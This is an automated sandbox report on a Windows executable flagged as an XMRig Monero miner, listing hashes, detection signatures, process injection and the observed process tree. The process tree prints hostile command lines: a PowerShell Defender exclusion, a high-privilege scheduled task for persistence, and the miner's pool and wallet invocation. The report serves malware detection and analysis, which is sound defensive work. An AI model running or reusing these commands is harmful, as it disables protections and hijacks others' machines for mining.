Analysis
-
max time kernel
62s -
max time network
134s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
10-01-2023 15:41
Static task
static1
General
-
Target
7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe
-
Size
847KB
-
MD5
9b6d69c17de2903f867f6fcf298bbe54
-
SHA1
4f7f126dcc0bef3ac869f6cedb644dfac478f057
-
SHA256
7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0
-
SHA512
5abc5ae652cd49e63c0fc5d3108bd0ecd597f9b8da3bcfd273f280f2630b28f10164ccda2b23dd7bb392a7b0ef9149fce89580c5796ee8210dd2180895758a86
-
SSDEEP
24576:7WSpSnFR9PZClGq6Y1aNd1AfuHc226mWp7XP:7WBJUGzFrpoWZX
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/5068-177-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5068-178-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/5068-179-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5068-180-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5068-182-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5068-187-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2492 set thread context of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3168 2492 WerFault.exe 65 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1096 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4560 powershell.exe 4560 powershell.exe 4560 powershell.exe 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 616 Process not Found -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeIncreaseQuotaPrivilege 4560 powershell.exe Token: SeSecurityPrivilege 4560 powershell.exe Token: SeTakeOwnershipPrivilege 4560 powershell.exe Token: SeLoadDriverPrivilege 4560 powershell.exe Token: SeSystemProfilePrivilege 4560 powershell.exe Token: SeSystemtimePrivilege 4560 powershell.exe Token: SeProfSingleProcessPrivilege 4560 powershell.exe Token: SeIncBasePriorityPrivilege 4560 powershell.exe Token: SeCreatePagefilePrivilege 4560 powershell.exe Token: SeBackupPrivilege 4560 powershell.exe Token: SeRestorePrivilege 4560 powershell.exe Token: SeShutdownPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeSystemEnvironmentPrivilege 4560 powershell.exe Token: SeRemoteShutdownPrivilege 4560 powershell.exe Token: SeUndockPrivilege 4560 powershell.exe Token: SeManageVolumePrivilege 4560 powershell.exe Token: 33 4560 powershell.exe Token: 34 4560 powershell.exe Token: 35 4560 powershell.exe Token: 36 4560 powershell.exe Token: SeLockMemoryPrivilege 5068 vbc.exe Token: SeLockMemoryPrivilege 5068 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5068 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2492 wrote to memory of 4560 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 66 PID 2492 wrote to memory of 4560 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 66 PID 2492 wrote to memory of 4904 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 69 PID 2492 wrote to memory of 4904 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 69 PID 4904 wrote to memory of 1096 4904 cmd.exe 71 PID 4904 wrote to memory of 1096 4904 cmd.exe 71 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73 PID 2492 wrote to memory of 5068 2492 7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe 73
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe"C:\Users\Admin\AppData\Local\Temp\7ed607049b1f6f5406ed03df2343cb54b7eb6379dc89feaacd693f9216769de0.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NLJZH" /tr "C:\ProgramData\googleApp\NLJZH.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NLJZH" /tr "C:\ProgramData\googleApp\NLJZH.exe"3⤵
- Creates scheduled task(s)
PID:1096
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5068
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2492 -s 29522⤵
- Program crash
PID:3168
-